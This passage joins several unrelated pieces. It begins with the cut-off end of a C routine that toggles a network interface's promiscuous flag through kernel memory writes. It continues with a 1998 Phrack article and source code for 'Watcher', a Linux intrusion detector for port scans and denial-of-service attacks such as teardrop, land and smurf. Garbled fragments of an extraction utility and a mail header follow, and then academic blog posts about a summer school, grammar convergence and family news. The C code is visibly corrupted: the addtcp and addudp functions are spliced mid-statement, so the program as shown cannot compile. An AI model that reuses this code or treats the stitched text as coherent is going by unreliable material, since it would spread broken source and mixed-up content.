; } putchar('>'); putchar('\n'); if (interface && strcmp(interface, ifname) == 0 && unit == ipifn.ipif_id){ switch (promisc) { case -1: break; case 0: if ((ipifn.ipif_flags & IFF_PROMISC) == 0) printf("\tIFF_PROMISC not set\n"); else { printf("\t%s:%d: clearing IFF_PROMISC\n", ifname, unit); ipifn.ipif_flags &= ~IFF_PROMISC; if (kwrite(kd, (u_long)ipifp, &ipifn, sizeof(ipifn)) == -1) perror("kwrite"); } break; default: if ((ipifn.ipif_flags & IFF_PROMISC) == IFF_PROMISC) printf("\tIFF_PROMISC set already\n"); else { printf("\t%s:%d: setting IFF_PROMISC\n", ifname, unit); ipifn.ipif_flags |= IFF_PROMISC; if (kwrite(kd, (u_long)ipifp, &ipifn, sizeof(ipifn)) == -1) perror("kwrite"); } break; } } } } } <--> ----[ EOF -------------------------------------------------------------------------------- ---[ Phrack Magazine Volume 8, Issue 53 July 8, 1998, article 11 of 15 -------------------------[ Watcher --------[ hyperion <hyperion@hacklab.com> ----[ INTRODUCTION Do you know if your system has been hacked? If you found those funny user accounts or that Trojaned program, its too late. You're owned. Chances are that your systems were scanned for holes before your systems were cracked. If you had just seen them coming you wouldn't be reloading that OS right now. Programs like TCP Wrappers do some good, but they don't see the stealth scans or DOS attacks. You could by a nice commercial network intrusion detector, but your wallet screams in agony. What you need is a low cost (as in free) fast, somewhat paranoid network monitor that watches all packets and uses few resources. Watcher provides this. ----[ IMPLEMENTATION Watcher examines all packets on the network interface and assumes they all are potentially hostile. Watcher examines every packet within a 10 second window, and, at the end of each window it will record any malicious activity it sees using syslog. Watcher currently detects the following attacks: - All TCP scans - All UDP scans - Synflood attacks - Teardrop attacks - Land attacks - Smurf attacks - Ping of death attacks All parameters and thresholds are configurable through command line options. You can also configure watcher to just look for scans or just look for DOS attacks. Watcher assumes any TCP packet other than a RST (which elicits no response) may be used to scan for services. If packets of any type are received by more than 7 different ports within the window, an event is logged. The same criteria are used for UDP scans. If watcher sees more than 8 SYN packets to the same port with no ACK's or FIN's associated with the SYN's, a synflood event is logged. If a fragmented UDP packet with an IP id of 242 is seen, it is assumed to be a teardrop attack since the published code uses an id of 242. This is somewhat lame since anyone could change the attacking code to use other id's. The code should track all fragmented IP's and check for overlapping offsets. I may do this in a future version. Any TCP SYN packets with source and destination address and ports the same is a identified as a land attack. If more than 5 ICMP ECHO REPLIES are seen within the window, Watcher assumes it may be a Smurf attack. Note that this is not a certainty, since someone your watching may just be pinging the hell out of someone. Watcher also assumes that any fragmented ICMP packet is bad, bad, bad. This catches attacks such as the ping of death. Watcher has three modes of monitoring. In the default mode, it just watches for attacks against its own host. The second monitoring mode is to watch all hosts on it's class C subnet. In the third mode, it watches all hosts whose packets it sees. Watching multiple hosts is useful if you put Watcher on your border to external networks, or to have hosts watch out for each other in case one gets cracked before you can react. Even if log files are destroyed, the other host has a record. It must be noted that since Watcher treats every packet as potentially hostile, it sometimes can report false positives. There are some checks in the code to minimize this by increasing its tolerance for certain activity. Unfortunately this also increases the rate at which scans can be done before Watcher notices. The usual false positives are TCP scans and synfloods, mostly resulting from WWW activity. Some web pages have many URL's to GIF files and other pretty stuff. Each of these may cause the client to open a separate TCP connection to download. Watcher sees these and treats them as a TCP scan of the client. To minimize this, watcher will only log TCP scans if more than 40 are received in the window AND the source port of the scan was 80. This of course can be configured higher or lower as desired. As for synfloods we will use the same WWW example above. If the client opens a lot of connections to the server right before the 10 second window expires and Watcher does not see the ACK's or FIN's for those SYN packets, Watcher will think the client is synflooding port 80 on the server. This only happens if watcher is watching the server, or if you are watching everyone. You may also get occasional false UDP scans if the system being watched makes lots of DNS queries within the window. The output for Watcher is pretty simple. Every 10 seconds, any detected attacks are logged to syslog. The source and target IP's are logged along with the type of attack. Where appropriate, other information such as the number of packets, or the port involved are logged. If the attack is normally associated with false IP addresses, the MAC address is also logged. If the attack is external, the MAC will be for the local router that handled the packet. If it was from your LAN, you'll have the source machine and you can thank the sender in an appropriate manner. ----[ PROGRAM EXECUTION Watcher was written to run on Linux systems. Watcher has a variety of, most of the self-explanatory. To execute watcher, simply run it in the background, usually from the system startup script. The options are: Usage: watcher [options] -d device Use 'device' as the network interface device The first non-loopback interface is the default -f flood Assume a synflood attack occurred if more than 'flood' uncompleted connections are received -h A little help here -i icmplimit Assume we may be part of a smurf attack if more than icmplimit ICMP ECHO REPLIES are seen -m level Monitor more than just our own host. A level of 'subnet' watches all addresses in our subnet and 'all' watches all addresses -p portlimit Logs a portscan alert if packets are received for more than portlimit ports in the timeout period. -r reporttype If reporttype is dos, only Denial Of Service attacks are reported. If reporttype is scan then only scanners are reported. Everything is reported by default. -t timeout Count packets and print potential attacks every timeout seconds -w webcount Assume we are being portscanned if more than webcount packets are received from port 80 Hopefully, watcher will keep your systems a little better protected. But remember that good security is multiple layers, and no single defense tool will save you by itself. If you forget this, you'll be reloading that OS one day. ----[ THE CODE <++> EX/Watcher.c /********************************************************************* Program: watcher A network level monitoring tool to detect incoming packets indicative of potential attacks. This software detects low level packet scanners and several DOS attacks. Its primary use is to detect low level packet scans, since these are usually done first to identify active systems and services to mount further attacks. The package assumes every incoming packet is potentially hostile. Some checks are done to minimize false positives, but on occasion a site may be falsely identified as having performed a packet scan or SYNFLOOD attack. This usually occurs if a large number of connections are done in a brief time right before the reporting timeout period (i.e. when browsing a WWW site with lots of little GIF's, each requiring a connection to download). You can also get false positives if you scan another site, since the targets responses will be viewed as a potential scan of your system. By default, alerts are printed to SYSLOG every 10 seconds. ***********************************************************************/ #include <stdio.h> #include <sys/types.h> #include <sys/time.h> #include <sys/socket.h> #include <sys/file.h> #include <sys/time.h> #include <netinet/in.h> #include <netdb.h> #include <string.h> #include <errno.h> #include <ctype.h> #include <malloc.h> #include <netinet/tcp.h> #include <netinet/in_systm.h> #include <net/if_arp.h> #include <net/if.h> #include <netinet/udp.h> #include <netinet/ip.h> #include <netinet/ip_icmp.h> #include <linux/if_ether.h> #include <syslog.h> #define PKTLEN 96 /* Should be enough for what we want */ #ifndef IP_MF #define IP_MF 0x2000 #endif /***** WATCH LEVELS ******/ #define MYSELFONLY 1 #define MYSUBNET 2 #define HUMANITARIAN 3 /***** REPORT LEVELS *****/ #define REPORTALL 1 #define REPORTDOS 2 #define REPORTSCAN 3 struct floodinfo { u_short sport; struct floodinfo *next; }; struct addrlist { u_long saddr; int cnt; int wwwcnt; struct addrlist *next; }; struct atk { u_long saddr; u_char eaddr[ETH_ALEN]; time_t atktime; }; struct pktin { u_long saddr; u_short sport; u_short dport; time_t timein; u_char eaddr[ETH_ALEN]; struct floodinfo *fi; struct pktin *next; }; struct scaninfo { u_long addr; struct atk teardrop; struct atk land; struct atk icmpfrag; struct pktin *tcpin; struct pktin *udpin; struct scaninfo *next; u_long icmpcnt; } ; struct scaninfo *Gsilist = NULL, *Gsi; u_long Gmaddr; time_t Gtimer = 10, Gtimein; int Gportlimit = 7; int Gsynflood = 8; int Gwebcount = 40; int Gicmplimit = 5; int Gwatchlevel = MYSELFONLY; int Greportlevel = REPORTALL; char *Gprogramname, *Gdevice = "eth0"; /******** IP packet info ********/ u_long Gsaddr, Gdaddr; int Giplen, Gisfrag, Gid; /****** Externals *************/ extern int errno; extern char *optarg; extern int optind, opterr; void do_tcp(), do_udp(), do_icmp(), print_info(), process_packet(); void addtcp(), addudp(), clear_pktin(), buildnet(); void doargs(), usage(), addfloodinfo(), rmfloodinfo(); struct scaninfo *doicare(), *addtarget(); char *anetaddr(), *ether_ntoa(); u_char *readdevice(); main(argc, argv) int argc; char *argv[]; { int pktlen = 0, i, netfd; u_char *pkt; char hostname[32]; struct hostent *hp; time_t t; doargs(argc, argv); openlog("WATCHER", 0, LOG_DAEMON); if(gethostname(hostname, sizeof(hostname)) < 0) { perror("gethostname"); exit(-1); } if((hp = gethostbyname(hostname)) == NULL) { fprintf(stderr, "Cannot find own address\n"); exit(-1); } memcpy((char *)&Gmaddr, hp->h_addr, hp->h_length); buildnet(); if((netfd = initdevice(O_RDWR, 0)) < 0) exit(-1); /* Now read packets forever and process them. */ t = time((time_t *)0); while(pkt = readdevice(netfd, &pktlen)) { process_packet(pkt, pktlen); if(time((time_t *)0) - t > Gtimer) { /* Times up. Print what we found and clean out old stuff. */ for(Gsi = Gsilist, i = 0; Gsi; Gsi = Gsi->next, i++) { clear_pktin(Gsi); print_info(); Gsi->icmpcnt = 0; } t = time((time_t *)0); } } } /********************************************************************** Function: doargs Purpose: sets values from environment or command line arguments. **********************************************************************/ void doargs(argc, argv) int argc; char **argv; { char c; Gprogramname = argv[0]; while((c = getopt(argc,argv,"d:f:hi:m:p:r:t:w:")) != EOF) { switch(c) { case 'd': Gdevice = optarg; break; case 'f': Gsynflood = atoi(optarg); break; case 'h': usage(); exit(0); case 'i': Gicmplimit = atoi(optarg); break; case 'm': if(strcmp(optarg, "all") == 0) Gwatchlevel = HUMANITARIAN; else if(strcmp(optarg, "subnet") == 0) Gwatchlevel = MYSUBNET; else { usage(); exit(-1); } break; case 'p': Gportlimit = atoi(optarg); break; case 'r': if(strcmp(optarg, "dos") == 0) Greportlevel = REPORTDOS; else if(strcmp(optarg, "scan") == 0) Greportlevel = REPORTSCAN; else { exit(-1); } break; case 't': Gtimer = atoi(optarg); break; case 'w': Gwebcount = atoi(optarg); break; default: usage(); exit(-1); } } } /********************************************************************** Function: usage Purpose: Display the usage of the program **********************************************************************/ void usage() { printf("Usage: %s [options]\n", Gprogramname); printf(" -d device Use 'device' as the network interface device\n"); printf(" The first non-loopback interface is the default\n"); printf(" -f flood Assume a synflood attack occurred if more than\n"); printf(" 'flood' uncompleted connections are received\n"); printf(" -h A little help here\n"); printf(" -i icmplimit Assume we may be part of a smurf attack if more\n"); printf(" than icmplimit ICMP ECHO REPLIES are seen\n"); printf(" -m level Monitor more than just our own host.\n"); printf(" A level of 'subnet' watches all addresses in our\n"); printf(" subnet and 'all' watches all addresses\n"); printf(" -p portlimit Logs a portscan alert if packets are received for\n"); printf(" more than portlimit ports in the timeout period.\n"); printf(" -r reporttype If reporttype is dos, only Denial Of Service\n"); printf(" attacks are reported. If reporttype is scan\n"); printf(" then only scanners are reported. Everything is\n"); printf(" reported by default.\n"); printf(" -t timeout Count packets and print potential attacks every\n"); printf(" timeout seconds\n"); printf(" -w webcount Assume we are being portscanned if more than\n"); printf(" webcount packets are received from port 80\n"); } /********************************************************************** Function: buildnet Purpose: Setup for monitoring of our host or entire subnet. **********************************************************************/ void buildnet() { u_long addr; u_char *p; int i; if(Gwatchlevel == MYSELFONLY) /* Just care about me */ { (void) addtarget(Gmaddr); } else if(Gwatchlevel == MYSUBNET) /* Friends and neighbors */ { addr = htonl(Gmaddr); addr = addr & 0xffffff00; for(i = 0; i < 256; i++) (void) addtarget(ntohl(addr + i)); } } /********************************************************************** Function: doicare Purpose: See if we monitor this address **********************************************************************/ struct scaninfo *doicare(addr) u_long addr; { struct scaninfo *si; int i; for(si = Gsilist; si; si = si->next) { if(si->addr == addr) return(si); } if(Gwatchlevel == HUMANITARIAN) /* Add a new address, we always care */ { si = addtarget(addr); return(si); } return(NULL); } /********************************************************************** Function: addtarget Purpose: Adds a new IP address to the list of hosts to watch. **********************************************************************/ struct scaninfo *addtarget(addr) u_long addr; { struct scaninfo *si; if((si = (struct scaninfo *)malloc(sizeof(struct scaninfo))) == NULL) { perror("malloc scaninfo"); exit(-1); } memset(si, 0, sizeof(struct scaninfo)); si->addr = addr; si->next = Gsilist; Gsilist = si; return(si); } /********************************************************************** Function: process_packet Purpose: Process raw packet and figure out what we need to to with it. Pulls the packet apart and stores key data in global areas for reference by other functions. **********************************************************************/ void process_packet(pkt, pktlen) u_char *pkt; int pktlen; { struct ethhdr *ep; struct iphdr *ip; static struct align { struct iphdr ip; char buf[PKTLEN]; } a1; u_short off; Gtimein = time((time_t *)0); ep = (struct ethhdr *) pkt; if(ntohs(ep->h_proto) != ETH_P_IP) return; pkt += sizeof(struct ethhdr); pktlen -= sizeof(struct ethhdr); memcpy(&a1, pkt, pktlen); ip = &a1.ip; Gsaddr = ip->saddr; Gdaddr = ip->daddr; if((Gsi = doicare(Gdaddr)) == NULL) return; off = ntohs(ip->frag_off); Gisfrag = (off & IP_MF); /* Set if packet is fragmented */ Giplen = ntohs(ip->tot_len); Gid = ntohs(ip->id); pkt = (u_char *)ip + (ip->ihl << 2); Giplen -= (ip->ihl << 2); switch(ip->protocol) { case IPPROTO_TCP: do_tcp(ep, pkt); break; case IPPROTO_UDP: do_udp(ep, pkt); break; case IPPROTO_ICMP: do_icmp(ep, pkt); break; default: break; } } /********************************************************************** Function: do_tcp Purpose: Process this TCP packet if it is important. **********************************************************************/ void do_tcp(ep, pkt) struct ethhdr *ep; u_char *pkt; { struct tcphdr *thdr; u_short sport, dport; thdr = (struct tcphdr *) pkt; if(thdr->th_flags & TH_RST) /* RST generates no response */ return; /* Therefore can't be used to scan. */ sport = ntohs(thdr->th_sport); dport = ntohs(thdr->th_dport); if(thdr->th_flags & TH_SYN) { if(Gsaddr == Gdaddr && sport == dport) { Gsi->land.atktime = Gtimein; Gsi->land.saddr = Gsaddr; memcpy(Gsi->land.eaddr, ep->h_source, ETH_ALEN); } } addtcp(sport, dport, thdr->th_flags, ep->h_source); } /********************************************************************** Function: addtcp Purpose: Add this TCP packet to our list. **********************************************************************/ void addtcp(sport, dport, flags, eaddr) u_short sport; u_short dport; u_char flags; u_char *eaddr; { struct pktin *pi, *last, *tpi; /* See if this packet relates to other packets already received. */ for(pi = Gsi->tcpin; pi; pi = pi->next) { if(pi->saddr == Gsaddr && pi->dport == dport) { if(flags == TH_SYN) addfloodinfo(pi, sport); else if((flags & TH_FIN) || (flags & TH_ACK)) rmfloodinfo(pi, sport);(flags == TH_SYN) addfloodinfo(tpi, sport); if(Gsi->tcpin) last->next = tpi; else Gsi->tcpin = tpi; } /********************************************************************** Function: addfloodinfo Purpose: Add floodinfo information **********************************************************************/ void addfloodinfo(pi, sport) struct pktin *pi; u_short sport; { struct floodinfo *fi; fi = (struct floodinfo *)malloc(sizeof(struct floodinfo)); if(fi == NULL) { perror("Malloc of floodinfo"); exit(-1); } memset(fi, 0, sizeof(struct floodinfo)); fi->sport = sport; fi->next = pi->fi; pi->fi = fi; } /********************************************************************** Function: rmfloodinfo Purpose: Removes floodinfo information **********************************************************************/ void rmfloodinfo(pi, sport) struct pktin *pi; u_short sport; { struct floodinfo *fi, *prev = NULL; for(fi = pi->fi; fi; fi = fi->next) { if(fi->sport == sport) break; prev = fi; } if(fi == NULL) return; if(prev == NULL) /* First element */ pi->fi = fi->next; else prev->next = fi->next; free(fi); } /********************************************************************** Function: do_udp Purpose: Process this udp packet. Currently teardrop and all its derivitives put 242 in the IP id field. This could obviously be changed. The truly paranoid might want to flag all fragmented UDP packets. The truly adventurous might enhance the code to track fragments and check them for overlaping boundaries. **********************************************************************/ void do_udp(ep, pkt) struct ethhdr *ep; u_char *pkt; { struct udphdr *uhdr; u_short sport, dport; uhdr = (struct udphdr *) pkt; if(Gid == 242 && Gisfrag) /* probable teardrop */ { Gsi->teardrop.saddr = Gsaddr; memcpy(Gsi->teardrop.eaddr, ep->h_source, ETH_ALEN); Gsi->teardrop.atktime = Gtimein; } sport = ntohs(uhdr->source); dport = ntohs(uhdr->dest); addudp(sport, dport, ep->h_source); } /********************************************************************** Function: addudp Purpose: Add this udp packet to our list. **********************************************************************/ void addudp(sport, dport, eaddr) u_short sport; u_short dport; u_char *eaddr; { struct pktin *pi, *last, *tpi; for(pi = Gsi->udpin; pi; pi = pi->next) { if(pi->saddr == Gsaddr && pi->dport == dport) { pi->timein = Gtimein;(Gsi->udpin) last->next = tpi; else Gsi->udpin = tpi; } /********************************************************************** Function: do_icmp Purpose: Process an ICMP packet. We assume there is no valid reason to receive a fragmented ICMP packet. **********************************************************************/ void do_icmp(ep, pkt) struct ethhdr *ep; u_char *pkt; { struct icmphdr *icmp; icmp = (struct icmphdr *) pkt; if(Gisfrag) /* probable ICMP attack (i.e. Ping of Death) */ { Gsi->icmpfrag.saddr = Gsaddr; memcpy(Gsi->icmpfrag.eaddr, ep->h_source, ETH_ALEN); Gsi->icmpfrag.atktime = Gtimein; } if(icmp->type == ICMP_ECHOREPLY) Gsi->icmpcnt++; return; } /********************************************************************** Function: clear_pkt Purpose: Delete and free space for any old packets. **********************************************************************/ void clear_pktin(si) struct scaninfo *si; { struct pktin *pi; struct floodinfo *fi, *tfi; time_t t, t2; t = time((time_t *)0); while(si->tcpin) { t2 = t - si->tcpin->timein; if(t2 > Gtimer) { pi = si->tcpin; fi = pi->fi; while(fi) { tfi = fi; fi = fi->next; free(tfi); } si->tcpin = pi->next; free(pi); } else break; } while(si->udpin) { t2 = t - si->udpin->timein; if(t2 > Gtimer) { pi = si->udpin; si->udpin = pi->next; free(pi); } else break; } } /********************************************************************** Function: print_info Purpose: Print out any alerts. **********************************************************************/ void print_info() { struct pktin *pi; struct addrlist *tcplist = NULL, *udplist = NULL, *al; struct floodinfo *fi; char buf[1024], *eaddr, abuf[32]; int i; strcpy(abuf, anetaddr(Gsi->addr)); if(Greportlevel == REPORTALL || Greportlevel == REPORTDOS) { if(Gsi->teardrop.atktime) { eaddr = ether_ntoa(Gsi->teardrop.eaddr); sprintf(buf, "Possible teardrop attack from %s (%s) against %s", anetaddr(Gsi->teardrop), eaddr, abuf); syslog(LOG_ALERT, buf); memset(&Gsi->teardrop, 0, sizeof(struct atk)); } if(Gsi->land.atktime) { eaddr = ether_ntoa(Gsi->land.eaddr); sprintf(buf, "Possible land attack from (%s) against %s", eaddr, abuf); syslog(LOG_ALERT, buf); memset(&Gsi->land, 0, sizeof(struct atk)); } if(Gsi->icmpfrag.atktime) { eaddr = ether_ntoa(Gsi->icmpfrag.eaddr); sprintf(buf, "ICMP fragment detected from %s (%s) against %s", anetaddr(Gsi->icmpfrag), eaddr, abuf); syslog(LOG_ALERT, buf); memset(&Gsi->icmpfrag, 0, sizeof(struct atk)); } if(Gsi->icmpcnt > Gicmplimit) { sprintf(buf, "ICMP ECHO threshold exceeded, smurfs up. I saw %d packets\n", Gsi->icmpcnt); syslog(LOG_ALERT, buf); Gsi->icmpcnt = 0; } } for(pi = Gsi->tcpin; pi; pi = pi->next) { i = 0; for(fi = pi->fi; fi; fi = fi->next) i++; if(Greportlevel == REPORTALL || Greportlevel == REPORTDOS) { if(i > Gsynflood) { eaddr = ether_ntoa(pi->eaddr); sprintf(buf, "Possible SYNFLOOD from %s (%s), against %s. I saw %d packets\n", anetaddr(pi->saddr), eaddr, abuf, i); syslog(LOG_ALERT, buf); } } for(al = tcplist; al; al = al->next) { if(pi->saddr == al->saddr) { al->cnt++; if(pi->sport == 80) al->wwwcnt++; break; } } if(al == NULL) /* new address */ { al = (struct addrlist *)malloc(sizeof(struct addrlist)); if(al == NULL) { perror("Malloc address list"); exit(-1); } memset(al, 0, sizeof(struct addrlist)); al->saddr = pi->saddr; al->cnt = 1; if(pi->sport == 80) al->wwwcnt = 1; al->next = tcplist; tcplist = al; } } if(Greportlevel == REPORTALL || Greportlevel == REPORTSCAN) { for(al = tcplist; al; al = al->next) { if((al->cnt - al->wwwcnt) > Gportlimit || al->wwwcnt > Gwebcount) { sprintf(buf, "Possible TCP port scan from %s (%d ports) against %s\n", anetaddr(al->saddr), al->cnt, abuf); syslog(LOG_ALERT, buf); } } for(pi = Gsi->udpin; pi; pi = pi->next) { for(al = udplist; al; al = al->next) { if(pi->saddr == al->saddr) { al->cnt++; break; } } if(al == NULL) /* new address */ { al = (struct addrlist *)malloc(sizeof(struct addrlist)); if(al == NULL) { perror("Malloc address list"); exit(-1); } memset(al, 0, sizeof(struct addrlist)); al->saddr = pi->saddr; al->cnt = 1; al->next = udplist; udplist = al; } } for(al = udplist; al; al = al->next) { if(al->cnt > Gportlimit) { sprintf(buf, "Possible UDP port scan from %s (%d ports) against %s\n", anetaddr(al->saddr), al->cnt, abuf); syslog(LOG_ALERT, buf); } } } while(tcplist) { al = tcplist->next; free(tcplist); tcplist = al; } while(udplist) { al = udplist->next; free(udplist); udplist = al; } } /************************************************************************ Function: anetaddr Description: Another version of the intoa function. ************************************************************************/ char *anetaddr(addr) u_long addr; { u_long naddr; static char buf[16]; u_char b[4]; int i; naddr = ntohl(addr); for(i = 3; i >= 0; i--) { b[i] = (u_char) (naddr & 0xff); naddr >>= 8; } sprintf(buf, "%d.%d.%d.%d", b[0], b[1], b[2], b[3]); return(buf); } /************************************************************************ Function: initdevice Description: Set up the network device so we can read it. **************************************************************************/ initdevice(fd_flags, dflags) int fd_flags; u_long dflags; { struct ifreq ifr; int fd, flags = 0; if((fd = socket(PF_INET, SOCK_PACKET, htons(0x0003))) < 0) { perror("Cannot open device socket"); exit(-1); } /* Get the existing interface flags */ strcpy(ifr.ifr_name, Gdevice); if(ioctl(fd, SIOCGIFFLAGS, &ifr) < 0) { perror("Cannot get interface flags"); exit(-1); } ifr.ifr_flags |= IFF_PROMISC; if(ioctl(fd, SIOCSIFFLAGS, &ifr) < 0) { perror("Cannot set interface flags"); exit(-1); } return(fd); } /************************************************************************ Function: readdevice Description: Read a packet from the device. **************************************************************************/ u_char *readdevice(fd, pktlen) int fd; int *pktlen; { int cc = 0, from_len, readmore = 1; struct sockaddr from; static u_char pktbuffer[PKTLEN]; u_char *cp; while(readmore) { from_len = sizeof(from); if((cc = recvfrom(fd, pktbuffer, PKTLEN, 0, &from, &from_len)) < 0) { if(errno != EWOULDBLOCK) return(NULL); } if(strcmp(Gdevice, from.sa_data) == 0) readmore = 0; } *pktlen = cc; return(pktbuffer); } /************************************************************************* Function: ether_ntoa Description: Translates a MAC address into ascii. This function emulates the ether_ntoa function that exists on Sun and Solaris, but not on Linux. It could probably (almost certainly) be more efficent, but it will do. *************************************************************************/ char *ether_ntoa(etheraddr) u_char etheraddr[ETH_ALEN]; { int i, j; static char eout[32]; char tbuf[10]; for(i = 0, j = 0; i < 5; i++) { eout[j++] = etheraddr[i] >> 4; eout[j++] = etheraddr[i] & 0xF; eout[j++] = ':'; } eout[j++] = etheraddr[i] >> 4; eout[j++] = etheraddr[i] & 0xF; eout[j++] = '\0'; for(i = 0; i < 17; i++) { if(eout[i] < 10) eout[i] += 0x30; else if(eout[i] < 16) eout[i] += 0x57; } return(eout); } <--> ----[ EOF -------------------------------------------------------------------------------- ---[ Phrack -------------------------------------------------------------------------------- ---[ Phrack); } <--> -------------------------------------------------------------------------------- ---[ Phrack: <pure lameness>: <pure lameness> Source: "Betty G.O'Hearn" <betty@infowar.com> <<adamb1@flash.net> Reply-To: adamb1@flash.net Date: March 26, 1998 Organization: Adam's Asylum To: "Betty G.O'Hearn" <<betty@infowar.com>... <sigh>]. <snicker>] -------------------------------------------------------------------------------- ---[ Phrack Magazine Volume 8, Issue 53 July 8, 1998, article 15 of 15 -------------------------[ Phrack Magzine Extraction Utility --------[ Phrack Staff Neat0! A python version! Thanks to Timmy 2tone <_spoon_@usa.net>. By all means, keep sending new versions on in. ---------------------8<------------CUT-HERE----------->8--------------------- <++> EX/PMEU/extract2.c /* extract.c by Phrack Staff and sirsyko * * (c) Phrack Magazine, 1997 * 1.8 * * ./extract file1 file2 file3 ... */ #include <stdio.h> #include <stdlib.h> #include <sys/stat.h> #include <string; fn_p = fn_p->next) { if (!(in_p = fopen(fn_p->name, "r"))) { fprintf(stderr, "Could not open input file %s.\n", fn_p->name); continue; } else fprintf(stderr, "Opened %s\n", fn_p->name); while (fgets(b, 256, in_p)) { if (!strncmp (b, BEGIN_TAG, BT_SIZE)) { b[strlen(b) - 1] = 0; /* Now we have a string. */ j++; if ((bp = strchr(b + BT_SIZE + 1, '/'))) { while (bp) { *bp = 0; mkdir(b + BT_SIZE, 07. <--> ----[ EOF --------------------------------------------------------------------------------
https://www.exploit-db.com/papers/42864/
CC-MAIN-2018-43
refinedweb
20,675
62.58
M. David Peterson has created a Linux Virtual Appliance that can be used to build IKVM.NET from source in a Linux environment without requiring a lot of complicated setup. root conary update --replace-files group-devel=conary.rpath.com@rpl:1 conary update cli-gac-tag cvs -z3 -d:pserver:anonymous@ikvm.cvs.sourceforge.net:/cvsroot/ikvm co -P ikvm cvs -z3 -d:pserver:anonymous@cvs.savannah.gnu.org:/sources/classpath co classpath ikvm nant That's it! Yesterday Sun announced that they will be releasing their Java platform implementations under the GPL v2 (+ Classpath exception for the J2SE libraries). This is great news for the Java ecosystem and for IKVM.NET as well, of course. A few people have mailed me to ask what this means specifically for IKVM. Here are my current plans (subject to change, as always): When the GPL version of the Java 7 libraries will be released, I will start working on integrating them with IKVM. Some parts of the libraries are not owned by Sun, so there will be holes in what they release, hopefully these can be filled soon (for example by code from GNU Classpath.) The Sun libraries obviously use native code to interface with the OS, for IKVM this is not ideal (JNI is slow and native code much less secure and robust than managed code), so where feasible I will continue to use my current "native" implementations (e.g. socket and file i/o) based on the .NET Framework. New snapshot where I've reintroduced netmodule support. I think that was the final issue resulting from the assembly class loader architecture change, but, as always, I welcome feedback. Changes: Source is in cvs. Binaries: ikvmbin-0.31.2475.zip Yet another new snapshot. Source is in cvs. Binaries: ikvmbin-0.31.2468.zip Again, a new snapshot. This time with some new magic to make Java boxed primitives integrate a little better with .NET string formatting. The following code now produces the expected result: class test{ public static void main(String[] args) { cli.System.Console.WriteLine("Java Magic = {0:X}", 0xCAFEBABE); cli.System.Console.WriteLine("Pi is approx. = {0:N2}", Math.PI); }} To enable this, the Java box classes have to implement IFormattable. I added support to the remapping infrastructure for this: <class name="java.lang.Double"> <implements class="cli.System.IFormattable"> <method name="ToString" sig="(Ljava.lang.String;Lcli.System.IFormatProvider;)Ljava.lang.String;"> <redirect class="ikvm.internal.Formatter" type="static" name="ToString" sig="(Ljava.lang.Double;Ljava.lang.String;Lcli.System.IFormatProvider;)Ljava.lang.String;" /> </method> </implements></class> The ToString helper method is trivial: public static String ToString(Double d, String format, IFormatProvider provider){ return ((IFormattable)CIL.box_double(d.doubleValue())).ToString(format, provider);} Note that from the Java side this is mostly invisible (the exception being that you can now cast a java.lang.Double to cli.System.IFormattable, even though the interface is not visible thru reflection). Source is in cvs. Binaries: ikvmbin-0.31.2466.zip More fixes and nio improvements and a regression fix.
http://weblog.ikvm.net/default.aspx?date=2006-11-28
CC-MAIN-2020-05
refinedweb
510
51.75
>How about splitting the unnamed version into explicit v0, v2, and internal? Advertising Currently our internal protobuf and v0 protobuf use the same unnamed version protobuf and under the same namespace (`package mesos`). If we are going to split v0 and internal, that requires copy all protobuf files under `package mesos` into `package mesos.internal` and need to change the whole code base to use the protobuf in `package mesos.internal`. But it is beneficial to do this, so that we could avoid [the hacks][1] that convert from the unversioned protobuf(v0) to the unversioned protobuf(internal). [1] On Thu, Oct 13, 2016 at 12. > > Looking forward to your thoughts and suggestions. > AlexR > > [1] > [2] > [3] > > 1f292ba20e/docs/versioning.md > -- Best Regards, Haosdent Huang
https://www.mail-archive.com/user@mesos.apache.org/msg08202.html
CC-MAIN-2016-50
refinedweb
125
58.28
I am about to finish a short article on SYB in Prolog. Deadline seems to be in 30 hours from now. If anyone has suggestions, I'd appreciate it. Thanks, Ralf "} ret So we are looking forward 8 "long" tutorials on different parts of the transformation/generation space of software engineering. For example, Bran Selic will stand in for model-based engineering and Jim Cordy will sketch his ultimate TXL cookbook. See the full program below. In addition, we will host a "research 2.0" event with Jean-Marie Favre and his companion Denis Avrilionis of One Tree Technologies as the moderators or speakers. Yet in addition, there are another 6 short tutorials. We are also in the process of putting together a participants' workshop. Combined with the social program, this will be a packed week as in previous years. At this point, we have 80+ registered participants. REGISTRATION DEADLINE: June 7 The Call for Participation follows. Regards, GTTSE 2009, 06-11 July, 2009, Braga, Portugal3rd International Summer School onGenerative and Transformational Techniques in Software Engineering REGISTRATION DEADLINE: June 7 SCOPE AND FORMATThe summer school brings together PhD students, lecturers, technologypresenters, as well as other researchers and practitioners who areinterested in the generation and the transformation of programs, data,models, meta-models, and documentation. This concerns many areas ofsoftware engineering: software reverse and re-engineering,model-driven approaches, automated software engineering, genericlanguage technology, to name a few. These areas differ with regard tothe specific sorts of meta-models (or grammars, schemas, formats etc.)that underlie the involved artifacts, and with regard to the specifictechniques that are employed for the generation and the transformationof the artifacts. The tutorials are given by renowned representativesof complementary approaches and problem domains. Each tutorialcombines foundations, methods, examples, and tool support. The programof the summer school also features invited technology presentations,which present setups for generative and transformationaltechniques. These presentations complement each other in terms of thechosen application domains, case studies, and the underlyingconcepts. The program of the school also features a participantsworkshop. All summer school material will be collected in proceedingsthat are handed out to the participants. Formal proceedings will becompiled after the summer school, where all contributions aresubjected to additional reviewing.The formal proceedings of the previous two instances of the summerschool (2005 and 2007) were published as volumes 4143 and 5235 in theLectureadaRESEARCH 2.0 EVENT * Research 2.0 and Software Engineering 2.0 Jean-Marie Favre and Denis Avrilionis OneTree Technologies SA, Luxembourg and University of Grenoble, FranceSHORT TUTORIALS * The 'Archæology' of Transformations Michel Wermelinger andORGANIZATIONADDITIONAL INFORMATIONFor additional information on the registration, program, venue, andother details of the summer school, please consult the web page: is also a contact email address: gttse09 AT list.uni MINUS koblenz.de. I. So here is the long promised paper on the Java case study for grammar convergence. Getting all these huge Java grammars to converge was not easy. We are still learning how to do this properly. We are still working on our transformation language, but we feel the results are good enough to go public now. The magic thing about grammar convergence is that it pushes you to necessarily find all the details of grammar variation. Arguably, grammar convergence should be more automatic. However, by asking you to make the transformation decisions, it helps you to understand the result. From now on, suites of related grammars should have no excuse to be flawed and close-lipped as far as their relationships go. Regards, PS: Now that I repaired the link I can as well put the abstract here. I. Berenike, Bernadette, and Isabelle are all doing great. I tend to put photos of my kids online when they get born, and then never again, which I admit is strange; see here and here. (There are only two links because B&B are twins.) I guess we have just so many photos of them that we don’t know which of them to put online. 